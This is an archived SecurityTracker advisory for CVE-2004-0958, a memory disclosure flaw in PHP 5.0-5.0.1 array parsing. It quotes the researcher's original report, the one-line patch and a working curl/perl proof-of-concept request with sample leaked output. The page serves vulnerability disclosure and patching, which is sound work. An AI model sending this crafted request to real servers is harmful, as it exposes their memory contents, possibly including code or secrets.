SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP Array Parsing Error in php_variables May Disclose Memory Contents via phpinfo()
SecurityTracker Alert ID:  1011279
SecurityTracker URL:  http://securitytracker.com/id/1011279
CVE Reference:   CVE-2004-0958   (Links to External Site)
Updated:  Oct 19 2004
Original Entry Date:  Sep 15 2004
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0 - 5.0.1
Description:   A vulnerability was reported in PHP in the phpinfo() function. A remote user may be able to obtain memory contents.

Stefano Di Paola reported that an array parsing error in 'php_variables.c' may cause the system to display arbitrary memory contents. A remote user can append a GET, POST, or COOKIE variable array to a request to trigger the flaw.

A demonstration exploit is shown [where 'phpinfo.php' contains the phpinfo() function]:

$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'`

Alternately, the file may contain a print_r($_REQUEST) function call.

Impact:   A remote user may be able to obtain random memory contents.
Solution:   A fix is available via CVS:

http://chora.php.net/php-src/main/php_variables.c

Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP Vulnerability N. 1


Hi all,
This summer i have been playing around with some php issue
and got some php vulnerabilities..

Let's go for the first one:



==========================================================
Title: php(super)info().
Affected: Php <= 5.0.1
Not Affected: it seems Php <= 4.1.2
Vulnerability Type:  Exposure of sensitive informations
Vendor Status: Fix released on cvs.php.net


==Summary:

Bad array parsing in php_variables.c could lead to show arbitrary memory
content such as pieces of php code and other data.
This affects all GET, POST or COOKIES variables.



==Description:

By appending to a GET/POST/COOKIE variable array a [ (open square
bracket) like abc[a][, 
the length of the 'a' array element is set to the length of variable
name strlen("abc").


$ curl  "http://www.example.com/phpinfo.php" -d `perl -e 'print
"f"x100;print "[g][=1"'`

where phpinfo.php is:
<?
phpinfo();
?>

or some php file containing print_r function:
<?
print_r($_REQUEST);
?>

it will print the output similar to:
------------------------------------------------
  Array
(
    [ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
      ffffffffffffffffffffffffffffffffffffffff] => Array
        (
           
[g\0_\0123\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0] => 1
        )
)
-----------------------------------------------

As probably you might have noticed all the garbage shown is memory
content that could be everything (on the heap i suppose). 

I have tried some request and it expose some piece of php code sometime.




==Solution: 
Authors were contacted and they released a fix for this problem.

The problem is easy to fix.

Find and replace around line 136 for php 5.0.1 in main/php_variables.c
from:

index_len = var_len = strlen(var);

to:

index_len = var_len = strlen(index);
and compile again.

But if you're lazy the patch can be found on the CVS
cvs.php.net/main/php_variables.c

=========================================


Stefano Di Paola

....----oOOo-------oOOo----....
Stefano Di Paola
Software Engineer
stefano.dipaola_at_wisec_dot_it
stefano.dipaola1_at_tin_dot_it
--------------------------------


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC